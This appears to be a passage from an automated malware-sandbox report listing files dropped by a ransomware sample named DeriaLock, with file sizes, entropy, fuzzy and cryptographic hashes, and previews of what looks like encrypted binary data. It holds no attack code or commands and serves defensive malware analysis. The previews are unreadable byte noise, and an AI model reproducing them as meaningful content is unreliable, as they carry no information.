                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:ZE...w..l....t.e.......?.P.{..|...9)..........g.~....O.GmS..V......yH...j.@..=..].7f....T....../..s..*.8.Ny..h...t..R.Z..{........Ux....e6...V.}..-x.k..R.Y...t..H...Z!..Dt..!.@..ly.B....G....F:o.1Y.<.X..=S.|..!@.].Y...U5....2.!y.yE.>..K8...qmVJ.T.II..[x2..L..7lP<%Q..5+..d[..jL5...f.....y.CU.E....fj.T......UMe.O.b !..ps..V....9%.9X.....%...<.|ovW@.T..a.B..+.7KJ...SI..N.q....D. \O5....z.*A........H.p....S....qc'#...m.j....[.k)[..goz....g.|.uC.$.{....T.*8V.-...K..a...lM.D..1.U.T..6..OY.}Pn@..b....0.0.1Dbl...@....uqM..f..%.x...`O..{..1...7.pQ.Q..vS.U02...;..&`...........?n....|Y...Z...$..{..}v..+.p.G..Q.......Q5V....Uh..bA.h..".!./..7.6....;..M?....HJ.....hK..S}.>.L-.y.5bqE3u.T..p.7.}.?WP[.T..8..C.4....vR.3..._.!+.N;.....K.B..=V#...TED..'4u..o..vkq9Z.pR.Lfb...... ....Mh.R...."...;.^.9...>.....6.t...O..'/#..e....^..;17.!`..IT.Di.X..........<............2rV.>..!..xl.. ....-..U.o......K%P.-i.E.qW6..{S...d.8......d...Hd.?$.[(..z4K-......UY.`V
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.791040625470676
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:sc04qw1rsn6Y3iRFyIchh6t1qhBKO8nAtOM+RrXf:scxqw1rW6YSRcIMh6jqhMVnDJXf
                                                                                                                                                            MD5:124FEF3BD5B0BF53FA542D147C5624D5
                                                                                                                                                            SHA1:7B05767BF18620615287F53B12CCC686D354FC0C
                                                                                                                                                            SHA-256:E8C9080D5438413C907DBB40BD028BBE0DC5C822484DCCA70599CB345A8E3BDD
                                                                                                                                                            SHA-512:5BED3B290D658DA50BA1200AF4FC5D9AEA8BC7FDF513188311990A70DBDCE7E3FD58DC6CC530EF21AE14D3567BD09B4C828DF6D17E6F7D19A084E36A87DDCFA8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:Q|)...n. .J.I.3.."m.1:..Mc[..V.....PoS.=5.....#...G...^.. .q...........T.0L8o...'...,..]..T.......b.Q.!!...*.O'J.3=.>1*.7..C....m].Y#..V.^..y.P.=.#M..p.UEz....Pz.GM...A?.......?F.-...\......f......I..},P....I.s.j?jT..<..Y...P.k.I....&.%Gm.7fm.&..( 'd.<.9..b.n..Hx....4..G..gU.O..O^>d..6..."........!.n-8.c..P.(h...t...0s..0..T.j&...'d.*`.e...........aX.$.yN.9$..G.oVz..v.o...&I.......Gm.?..[D...<.^aP...}..g..4....T......" =........U@.~.....b.$.b;$...t8.%m.-...u&a.!2.'..R.&.c..^}..dB{.J..J....T 1..X..O8h$..^P.......W.?....^.....n..d=.cdl.p..kBB.<..OC.i.g.....$w../a.Nu.Ps.;8J.. ......J%.\Hd{:...T..|........a..[.B..v.V"..m<..J.7v.....=(.71.?.Vm.....*..|Jdr..o\..p.L...WC..h.T@.1...W.J.G.&.9._...q....L.R....cl..t...!.}jUn..a>;1.;....(..'.&...m.s.4..7."....z..p.#._.cdf..=..P..O.{....e}l`X.......<M.?....@..B...N.f.3.+.S...}....9.p..cDP.....Yl...Xr.4.m...dM.(...IYq...9.I%..m..E..u$.%.v.uy.$.U......K..qN.....\lM...k...9.:........y......l!......8.O..F...i&,^.@
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.802560948580942
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:RleGaabX71NlwQ/eyNvOUwjawg+OXJy02fITJmWvbK9rLmF:RVaaHpn/tWJK+Ow02fIIWTKRy
                                                                                                                                                            MD5:A44B516CBF203DE6BB2C421AFB6B4FE3
                                                                                                                                                            SHA1:925DE47197B287321D1730D3EDB67968EEC81FEC
                                                                                                                                                            SHA-256:3F680364BEE8DF27D52D24B5930B1610C9F9384C1DC41B7D6CF55FCB201417BE
                                                                                                                                                            SHA-512:61FB27443C938803C962C43564C2B30D5B5832921E711E1DA88B715D617209D7C88E472D5956F34C79ADE8D886397F0400FF8503AB814B2B3A15573572494ED5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:....w1;..*..#.^4..zH8.1....=.-...d.5n.zW0d.Mcw..6-...ZF...iw.`...[..X\t=.Q..F53.T..A!vH.c..4.Rr.v...`%r.@u..*...X{0E....+|..C...$..Q..K.*.<...$k..5r]-.`.|R._.^>.N..Cz..n..a_U.. ..}Rh.b .L.>..7..."k...!.Is%k....Mx.!....>R.1..?.M.{.`.....J.P...a....".L.se.c.*8....|..v....."|..L...3.mT[.p.6.S,*ZJ.R....d.....qC.}..F .....A....$..;....M.....u..L.V....i...".FO..x.....4...Mx.t.k..%aK.o.,..2X..Wi.*...uT5...-\..;.......7.x.?...[?...&.H.:.....a.5..._.$+.I.F...m.K.|..P.'/Y.SP...I...X.....e$.+...I..=peh...nK..S.0.n(..z.7/.i0C.G.A....#?...D.Zj...HM..O/.....G......"...m.'dQ.....#LA.L<\...N.<.-l1yt....3.................(....9....q.m.c......P%<K.{.."Y.\%\k..0a..k?l.X.Q...(R.....c..lW.s...SS_.J.X.o....iv-.d6.....|.....xu+..K.....%?...-.!~.cb..(........?(t.{..G/.u..7._2.....|*.{..O......CL..{W...t..W5...{.M...H{..P\.....l..8..?Duz.....o........ha..|.>....0k..9#w....9.......#Rw...j{L.o.e..........eia .qCN_.&......J.......$..L.^+O.Vd.2..4b....;g.].s
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.849927786593994
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:s0bN0FF23SvsjXRXZZfmGQ235+3mof8HU+CeRsbZ/q8+:tN2F3sjhXvvb3tyUU+LKbO
                                                                                                                                                            MD5:D5C4D393F8E23EED2404A351A9842355
                                                                                                                                                            SHA1:E0A0F3F6278D86154A49CFD019D0D1ADAED51449
                                                                                                                                                            SHA-256:F6351B3E5032AF8547F27698E2F0734E6961605C13A45D262F15B72CAE622012
                                                                                                                                                            SHA-512:9A54B41CBC54FB9C5302D92C682F4BC82D298E794C94FAEFB4EE0BD439509E1A9D4836521FE75E8B12D40127FB0E92074030FCC40B55388AA0584789E4133E2A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:#iiu.K....n.......zn._../....(.3?.=^.2/..D...EQs..S.#..Z+'..kn..L.Y...NE..#.....z...uc.2...|E.hzwh.....i..]..FT.....`...........4..^.Ig..Q4.,...cZ.]..g]5hVn.TR.....}..N....Y1.?.J.~36...Z...L5......e..l.`...R.=.J)'`s....:=.\........_c."qhr....}............. }x...\.>...Pu.3.X.wO.l..j....}RyvCz4C..W.I^.KaP>B...#."H,R?...._".9..K...rK,.Z/V.4.7..O.y.....q.......\.Q..dd...n.~c;I..f.MBh.0s.s ...-....@."..2.R.d-..M...$-.S..:38..Wj.._|:$.......m....Cd.C/...^.A<.......g...Ta..};....V.%.ly<<OB. 8..(.).A.Y.I...:...4...5b.Y....e.o..m.d..h....Z)E...#c...hgC...\........?....mVb]&.`......I*.&AO.~w}W......W.$l.z....4..`...Ypu9..I&......g. .S.pz...6m3.....F.......c*......P..[...I0..".*..-{~....$..T.X....{. .....D..M.i?...4%kX.Z..<..+...D/(D..u..o..[.B..UI:.w.'..F%...$~.T.....`QW.....JH..}.. ...;.A.co*&=m....V.t....s.*...2*.,.?a.X......J........CL...02B...c... ....*l4M.f..Cj..h.`]9..pv....e..Q.t{;v..K.N..^(.J...Rf.2..ZDq7.-...f#.H.........E.8}%/..q.....-.....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.779319940982767
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ubZsXYTCdgAsbldovgwAjLVMSe6AnrC+MOKP1+h7vQXd/:ubZZTCdgRldOgw6ZMj3nrVMOKN+h2/
                                                                                                                                                            MD5:E9DCA8B1BB51DE9870F95B03131673C1
                                                                                                                                                            SHA1:4C95E7095C875EF1A2A553800CCBEA84F35D9078
                                                                                                                                                            SHA-256:D54A492925B71113A6E71A65CCF9379728C8DE1228006F8DED5346F91D02700D
                                                                                                                                                            SHA-512:9FFA1D86D77F0CF97519A3387D1F18CB71B9916E5573F245791BEA3E92771994323F569CB00345810A5BF4B8FD16D30B3E83726A98F4A01A82FA01E643EEC6EF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:e.rt.....MG.7.".}....."+..#k.}m...}.+.gA....`.j=?....}.Av.s8.i.)G....N......0..*c..h....q..... .....n.fE..~#qc/.[).Z.:..U..}...5....xI..[....o...J=2`.M.....b...Hm.....}.ld..L..T.:.7.(.3...7...n-I.Z...7k.e4.a.G.^.L.F.mx.....>..<Z5kT.99..N...pt.f.i...G....`r..7iC'....:..j....7..QO.@...]...76..l<l.^]UP.....Vpf..F.0.(....;.d..-.J~A....A........ .U.0.H...{~Yv#.5..S....z.6...^....:p^...R..>.......l..`:JO....R_`Z....Z..WS)... 4.l..u-..v..!...{.Z.t>c.)6../..gT...aR.AX.FT6...(.......o.I....D.. .V6...m..`3..DW...r..Q.<.......0W......w.=.Q..~....?..|............C.EgD.|`:...R*f...&.P..n.~.....F...;dg...W.#...Z3:.6...c.9;.%...[5.hJ.........L....@.C.....AV5...Uj....z...%8..l..nX;...F....`.H.#9....=.L..%..YR.........p.....).9|..i/6...'....f..e.......LQc#...x.....f..Lb...;.s!..A.8.t/..u..Qf..|@..c.r#*.. ..{.>.T.t'Zj.u._S=.5I..QZ.....{..I......O..~..r8.4ro.f7..O..4..i.G`..*D.rg.1....=.r8......t@G.5/.$m.....l.I"d..^>?b.\.i......n.P...o>...1D...L.)....g..oG.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.791817467050865
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Ek2LVJF6oKXY9eHgbQQ9uUosVGKG+aL4nHcLTEwTD:iLVndZ9uUZV5SEuD
                                                                                                                                                            MD5:625350761613B0B58E9D523B7C44C85A
                                                                                                                                                            SHA1:EFCAE3B92FD9B2795EB7A92976F6ECEE85ECF7D3
                                                                                                                                                            SHA-256:38056238CD46E3977BFEA0E8FFFF74037B77641792AF2BC5460B9277546BD045
                                                                                                                                                            SHA-512:873D5F2065F26687F0325A2D1D73BF6664E87BC70A5E6D2588E187CC1BB1CD16F723ECBF442A7F1340F62F304D164CD62560F6ED99FC7020DDB6508F0770F5AB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..7..YA!..u.-..._.k.fO..t.?...Q!|..!...G=F@..Z..?\..#f..".9S....+..)~x.....&%...A..p....z...a.Ryt..9.Q.j..dh..kO.^o.z.oj."."....p....&.O..............i..-...l?b..~.n.."'...h......X?...6..<sC.W....L.(t..q....#.(...8.`1....1.....:.d.t..z..n........Z......A.v..?..q.................y.....TM.1....4..K.i.>...g....D..........&..._:...E...{8}.:.......$I.....:v...i<k .}a.!..3Z....?.Y{.e.E.6c......m!....{E..}..z..:..m..R[..!.w.m~..~<j.\...!...z..J#"...Z.{Zo..........8M.....<Ot...].FF@..4.....P@f.8UH...n..".....@t. ...E....BM.]......:..oa...>!RA..".H.^.D._.n^.6.bk2..n.D...b .19rMK........XU...'.o.Y.p.....-q....0..0......n..=....Ud..Q...a.i....W.........2PGO..!....:...M+.....q0.ua.,..<s........oL7".u..E.?.1.BOj=.1..M.z].h2....2.F.J.......-OJ..R...r.R..j...ie....r.q.|........3wc...l.....f...o..Q.'E]&)J......B.........um1..FQ#.M"OK.;....6q.|...!8..E..w.M.`.e..5pf+.M....q?.......>.4.F..xg.e.J.{P#$.1.*.......Q|{l,>3....F...]..^R....Q..^Iz..4.o.a...2.w.F-
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.810993294312506
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:EzJGY1gYLRCjSyYuXyJTHOe6tPaw4nbKUxqgQM9lYNF/oJ:4GgwjSLOeFPQ+OFM
                                                                                                                                                            MD5:3264639B956844AAABB57E64611F436C
                                                                                                                                                            SHA1:E3D62044B9F5FEB2080D9BB7987653605F94C0B4
                                                                                                                                                            SHA-256:A922EF662BE2CDDB376CA8B52F0216D392FF41E8CBCBF1751F0B7FC439F4B7A9
                                                                                                                                                            SHA-512:CA73B61CE6FC855D4E05F897768D7743B74BC9557D3824F025B84634A435188783DF846349EA120D04E4BE1BF0495F390D0A34F8D58587D6993D088785B8A57D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:....~@.....j..8+.%d..K. ..@..Ed...t.p^..|.`p..Y7./......r.(dS.b...=hj..R...M.Y6AX84.!.{...78.L...M........U......`u.VE2..m.]B...{c..f.;....j. .c...>....m...........i...t)..."Y i.......U.k.....n.({..M.....[..u..]..R*....k....!&,.bU.B.......3Nb*..... ../}.....z.TZ...W*..`..+4r..@..19.m..-....Cx..S....*.wRXb...w........5I...ViC.J.A@...<..R....R.g.+..?......3Z....-......`...m...$0Y/....&a.g.kQ.Rw......N...uV"....M.]b1pKN.... Sx.)-....`.......`|l..3..#..gc`).WA5...".....24..J<......4O.7`..N.GB....|...7+Cm.{....e.s...%.j.v..%q..C...[XC_C._#..p..B.'.s.)...Q.^..X.q..k..y...z8...S%..D.......tG..d}.n.B...H...4.>.#5....8b...5'.CV\O..a.BQWg..h/..Vm....M..c.7..4M.0.X.+8..>S..j.DY..-.....^.......B.....2H.f(.].Bw...&.lK.....R.W...5...........0.N.~.V~f..i...].+.f'..s%.....>...N.......k....N........Z.....}..Vhc.2Rf......F....V..U7|u$....T.'/.@-.n]..Pf..u.^H....#..bU%F...b.n..I........(......*J........4.R.O......rWK.....ye`.}1n.x...IWxS.;B.....P-..W.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.812391694022478
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:DoLk76WtO08yS4d1IoXz2jksZqSIOpd53YXWIIdoDbkt8xeW:Df7Zt/Fd2oXzIjZ7eXWVmb68
                                                                                                                                                            MD5:19531BA4D003DA464A179A4C7D474BF5
                                                                                                                                                            SHA1:804A8A5F6ABCCE1C5CD03317A8B28140492FA5F3
                                                                                                                                                            SHA-256:44EFC5994AD807946C12B50462B4816FA7659E9D35AFD3B07C26AAF46F003BFB
                                                                                                                                                            SHA-512:63E60DB51F7F68A37144692281CF890B113F094806580BBC6A9869AB8A0BDF970185FBA98E8D0124295B237F9578C075F9C13F74D400E523F204100583173133
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.L....*.0......o`..Z..B...d8........!..I.v..w.1-"F...D.,R.4...d|_=.i:....0..+t0.|....j_.(v.+.!}..Y.....H.....H...........! ._0.2....)....3..I.]..((.Du..EU..8_:.i`..#.p.t.n.M.....w.}.b..x...<.+'...c..K..........hY.[.O..'s.^io."$.B.H.....a.|(.u.0Xa.....'k.............{;l..Bi.&.)..q3g....3..h.;zx.)Ee....{1...G).6....o..h!...Q.s,.v.`...>.m.?.......5.s.....f..%/3...R.....ss...)..q.I...#1...p.3^M.y.x.;._.'..o....<.=^..+...-...B.w.+..>...p.x.j.j.U4J..C.....$.u.....M....x.F.......Ql...&...R...:0...P......~=$.......\B....u...^../..J.>0....../...@......R+.P....$.!.XE..*%[....Qc.......S..+...fR,x....}.X-.....{P.. ...#Q...W..g81.Z.)...;..)....@ s5.,o...R...$F:....2..h...E....U.8.[.6.T..A9...=M...x%..-.a.9.$....Qh...?..........4......-K<.9%.*..KO.....ZC{f|N...&!..j8n.m.)....n....eay.uE.DO.....D^....nX....8x...E.m....9d.Y...|y..`V....D.s....u.G.3...c.....{..{..|.'_.....].,.#.^.M..u.UD..3.... T....;..Xu...>....L.F.A..U..@.6....n#O....p....|.).
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.798081593879069
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TXJ18pODSZbdW5lBq6IfVqwqlFFRJwE46GeqaLBcLXlK3h:TXUVbdW5lBwtqnFBTGeqaLBcXleh
                                                                                                                                                            MD5:175367394C0FA2D7AFFEAA34D2767910
                                                                                                                                                            SHA1:0D6D59317F5A64E47BB030F9CE17A234EA8CA601
                                                                                                                                                            SHA-256:D2D1B2C09ECD9145D3F43720CC196A4AAC9EF18067239DD7818B8A0326CDA1A1
                                                                                                                                                            SHA-512:9C678E413CB82416EA6EA7C8D83A496E23CAD1FC2C937C16E7ADBADC38853ED1D16FE380D919C07DCD9AE5C3ACE14E902B6495189D3571D2A592FB310F883FEE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:t92.$O<....P.......k..Z{t8.....8.2]...3.....sR..c=v.?....Y.?0..r}..V.}'.R..*'.....~..L.U..fH...y.D..sm....A%.Ku.j..^....U,.y.,...Pz>wh..W.....oK......'.y...%....^.d.kUh.K...,.D.$.G.....c.S.]tc%V..U..x.......,..v..V..X...ua....}^.....Z_.'.....O8.A.....G.y....3wq.-...4Q...|N...ZA....Wr.>:.k.h.=.B.....$....0..k......e....Z.../.~..]......'w.#Z.....:.aOz...~8.3{[...X.r.......&...s..Nl..U.5..c..)...+!,...D<......&O.....Y(..INe.0g.#.....QN.......u.=."....V..&.....d..i...).#.V..6.2..8.n|.&..7....:.\.e.\.+...).^.I/.^N4...8...)q7.._..........@..-l.o..Q...l......4}.dH...".....J.i.(u.%..c>..X'..-.=.............Q.]L..ha....O....?.?I..e..!..r.+..y..'K{.x0w.0......KF.|..<c.5.d..t!.a7.....&.59t.w.. .t.M.Q...4....V.lCG..E.2z...J|Urz.C.0.4#..8.....".>..`>./.J....L..........?..?......&6.....I.k....#U....../(.U....3wly.m...........X....:.k1...\.R..t."l.Qj...k...J.h..OT.oW;e..t7..a.w...f...........+.......Gy\..T...cs..5=2...}....f...B4.....}q..a..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.80988499852796
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:63ZRu/9ao3EHd5nt/hdT+nf+tNx73y1lvKq:6pVqEHdPXT0f+tNx73WZKq
                                                                                                                                                            MD5:42108AB51252E9EB1A9EF775B8714784
                                                                                                                                                            SHA1:38F73ED813B97F3D4E208304A63E026B6202D892
                                                                                                                                                            SHA-256:6C101809AFB4DC46A0B778244A833B40E069F32E2BF0B83F0E9C22388B6DB611
                                                                                                                                                            SHA-512:7517C142BD569BCF299B2A34BACDB4B22819EB15C7279722C042025E44751F57379B0E6EE27B8A432B7EEC00EBC92B90D2BDFFD1AB3A037D8C24DD1835DF1B61
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:...]LVN.......k.R.y.h..6.=.r[.K.u.o.....4h.R..Wh:....%RqID.z..N5.Q./.[.n..x.s......t.oVr.2....>....2g<..%......K...q.)].#5.~y...0...FLG.1..S.=....@.(.......G4..-{..l.~;.G.,.g..o.a..a.Lr.F.j.AP......>J.[.Z.v!l.......e..Z.,.^.?/..H.v..B|.X...'b.F...H.....6.$KFq).}..x....H...iE.)q..Z..i...r..3.t{......*j.Z..,..>.2h..G('=!...).2R..yc.@...@...<..."W.......Z.u......w..3.b..7!...2...[..|..g.4...h}...>..+ru..a.M.E.....(...4..Gy...^..k.'.|9.$.@..=...q3....h..7.{.e.B.!.C....{.(L..}..U.o..s...h_S!V5...dw.....$.~.o+.....}..t.#..d._jd.S....$..kU ..]."..i.LS....,....<> ..L.h.......O....-.....)~Vx.Y>4L..TKW...\.......z{...C...x8y.......ou...._.....JJ)!..v.r.>#3v.q.c..F..P.I..,:...6...T.$......o...(6.M.Un..*.~h.%7).....H..../....'..n.Vv...V.........Z.J...Q...,!.Jb`.;../3/.[y.d.CS..[..x..i...@...l.. ..QV...`.....X..^.'C.!h._.......[...\...O.....EW...w...:$......r..-. .vu....!.vY..._.b.`..xL../P.*.6k.kRJdr.HV.m_w#8g.gysf.O-...Q@.........NHw.A...X...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.8373159199038405
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:6NHHXZkSjdF3iuXzqUDqFzLOfl3A6tnzusDt1vsyxlomTzcICR0FjE4KfTBC:c3ZxF33XzbDiOt3ftqqP785ggDfTU
                                                                                                                                                            MD5:FBFE72445217781B2583DB90DE4F13E8
                                                                                                                                                            SHA1:F9E72D88642D7B380C8523421BEB732F9C75A3BC
                                                                                                                                                            SHA-256:D23B9FABC48A6A8245D1B2325275C2435CB2BC6D79457A587AAFC7CA9A57D7D0
                                                                                                                                                            SHA-512:A66E654D44133C78C74E46299E8EDE07B9AD0DBB2597A21CE2754FE8CDA61A4C97540B703FB9CB6BC0983566578B0007DC4198B4D4987CCFE5F9D0E0099DB997
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:....;....b..=[.|.iM.&.<d......A4BW8~..]A...U!|.9Y.=J(....*.p... ...3..R.^....m...u..}..?l......)........+8.G.0J..%..b.7.....hb.b.=o.....7.m.4.q.F....p.........f.h......zA..j...@4O....V..R.1<..S.wb.o..].E..O.jq...+T..6..x9...!Q.[....LE%s^....V.61......-f..Z..'..m..Ja.~IT2....*.J'..}~..Q....}.\.........4C.....T..2sB.we..!.>Z*..pZ.-.....N..`..1...r.9.wF..`........*5$U.v......@D.~R.o...?d...r#.........)...d..k.H.'.J...s.....)...@Xd...^....F...^......g...1.L..m..J..~.....#O..2..)....".....+..0v......t\5g.@O].yMbS......wvasfm.#...b...._xn...H.}.H...>3.......o.............g.Q....:.....h".$d.9.e.kS...v$..*.....R..^.0n]...........i.E...bQ.,.e=D.!....8...!.....@l...a.x..2.5..y..R.|% =f.+.9X..6..'4...lx...DH....Boz.?...(.*.:.........uAJ.....T?..,.OX..."NO.......#.b..E1......_.^=..-..2.....o...,.<.. D8...6F...1..d.{....U.s|z.5.@......F{..<w.(...H.k,R..Z.dCv;.+:......1.4..r&..AJm..0.i.#....4h'&M..nRW..gh..c.z..J+.G.....W......=...x.. ....J.8..j.eu.2&..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.801695836903747
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:N7/OIRfakb88T3Bhp89LK9zIRRHK8jTwUphFJ4GD1DwqTh:N7GYikA8TnpiOhIRRHKMDyGD1kQh
                                                                                                                                                            MD5:CCC647124CF7D94C379A8A4A5697B819
                                                                                                                                                            SHA1:32E77332BCE339266CF636044A56DA122CA9DD51
                                                                                                                                                            SHA-256:AB1653DF82D8CCAD3478340737268B072C805F9CC0B03A059011D2762960E858
                                                                                                                                                            SHA-512:C32AF66A5EEE80CAF13631EF6F80520F189E6523B86C06C75F59C235A06B498ACB264896F43952936C86BA444A309D0C6A0A27F85E04BDA2F41B04355A6684FB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:t..).V....o..tc./(....$.E.JyP.psq...r-e.........z...Srn....Ox9L..3./..+).%.XC`.."q...0!..P`.|..i1.........p....D.8....]..%.....uX.i.Y8W.Sf......ku.a..C.u.I.E....-././e#...._.3`..?...dI......k(]a..B..2._.#.3.d....4....a.C..{.........)8>.o9MU...{..`.,tL...|..f......."y......,..<.......L.6j.g...La..r./....k./T_...R._.$...U98.h.OFP.-.2...b.r4H...q.#^|.8..k...W+.*.......GV{....k..Q..~f^S.[..j.q..^A..E.<.Kwkh...v..k..s.3..m.W.J...P..W&c..e..iR..P..L.W.3D.l.<P.+.!...Q.o...hJ..C.GE..]}l..O..W......w ....*....[..@%..y..Z...B..^z.OJ..7.+.KK.|a...c2.._..........$.@[`.......".^....-z..Uo....+.*..2,.N/..zVy.ID...e.K?..Q.>v...J.d...x.yg._."M............z..Z..R..|......M.M..p.....rz...^N..WZ...)w.\..ql..h.z<.k.V!.j...y.h.^6.7C..X5@..A.........BL........5...w.v.D..o....b"..6.:.4.;.j.D..O..i......F'....R.Q........^<J....Y.X..d.....E...d..'.Z..3.+.8 ..`.L)*......y..}......^`..r...j|.P.j.L...?..,...".9.c..b.?&.k..p._..i7....C.._.#..H.`.."..\ZtA9.g|8E.`O.n...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.815894301962739
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:f9gzyqxeWM4g616INO/YRujaD+hUYCGwhKtIKLWkjL:6zMWFAAROaD+hUBGwhOLWkjL
                                                                                                                                                            MD5:4AF643BDBB142FF79ECA05461EF2BCA5
                                                                                                                                                            SHA1:D6CCDC96CD03622F107F4BF31522BE0868460025
                                                                                                                                                            SHA-256:3D1D9367E5D4C6808982D7024DA5D7D8AD6A818EA92122F3EF5A328AB01B6524
                                                                                                                                                            SHA-512:EE3854D5848A3A40A52EBDBCE67069A87FD37C68FCB28B9663BCE72967E22FB051F3C74282C3971FBA1BE454B4A8730F5171CCFCFC6D7770045B924FE30425CE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:sZ76v.>.D.B..[.ib......5..uA.#...3-...x...3...Bv...A..+{F..G5.).R.24.[2F8....4s.....L.T.Q.k...6.Z9..........;..t..=`.......J.o...o...t...`7V.=.Qj....DqL....o...R>*...t%..&......]#I.qP.v.....0..rw,8O>D0.";.5.7..'0..3.o.`.c+<.R..a....*...c.....:....F...PT@..;.5..`.}.=..%.a..`A.?. ...A|\.\.q.L..#...B/..F..6.uu0[...@k..Yl!..K...9U.oP^...[qH.7..3.....(K.eu..Z.q.....m2...o.....#...7..r....O..`4..4W...m...V`I..5..?.....4...&..+ .....3.&]./.*..!../.5..{x...nZ.t.Q\...YW.7.X.h7a.VD.0&(G.]............r...qa].+J.;.......tv"..2\.....}..6./..2 .G....?& |0+(.E....4.b.Wd..l..:}.5...N...ko.pH.R$Q...(......X.@..91.`.9.B..=.`...1P.d..7`..O3.o...._.^.s^..I..-F8.Y..S.........<!..+..9q.x......H^.....K~.......)Ru..)..e......W.N..p.....Zy..&.....-.....6..S..IO5..3.6Xe.r..9......a.......a.AXfO...........(e.G.,/.#..j...Cw.DK.....6i...CV..}LD...Uzy..r....Z.h.....5.GT....V.,.....6k]O....+..#L....h<,..p/....7.!.....$2....Y.....Ud;6J...Pp[..r..Zb...n'.D..R
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.831897196804417
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:+fZXY8nE72RFTVrCBPKvj6KuRleeqtNzbS3+NrKCDzjx9:+f5bnXR5VWPKL67YfX5z99
                                                                                                                                                            MD5:F21504ADDBFC8FABE5BE1F4E4040B245
                                                                                                                                                            SHA1:E84A7044B75305611EC7D51E7FE8717E6A0C7B5A
                                                                                                                                                            SHA-256:3F8C7F74D829A790829A9895961C3056BEB7BF80C0550147F20C3FCB37471297
                                                                                                                                                            SHA-512:9A927C181CE32ECFE4F6AE9324B398D7F9F5A89075F810CC7257751DC69FB0F79971551DBD16F55F34592E8C878A82F5017F7DF716C1AEFEA6FB5D32E5DFDF57
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
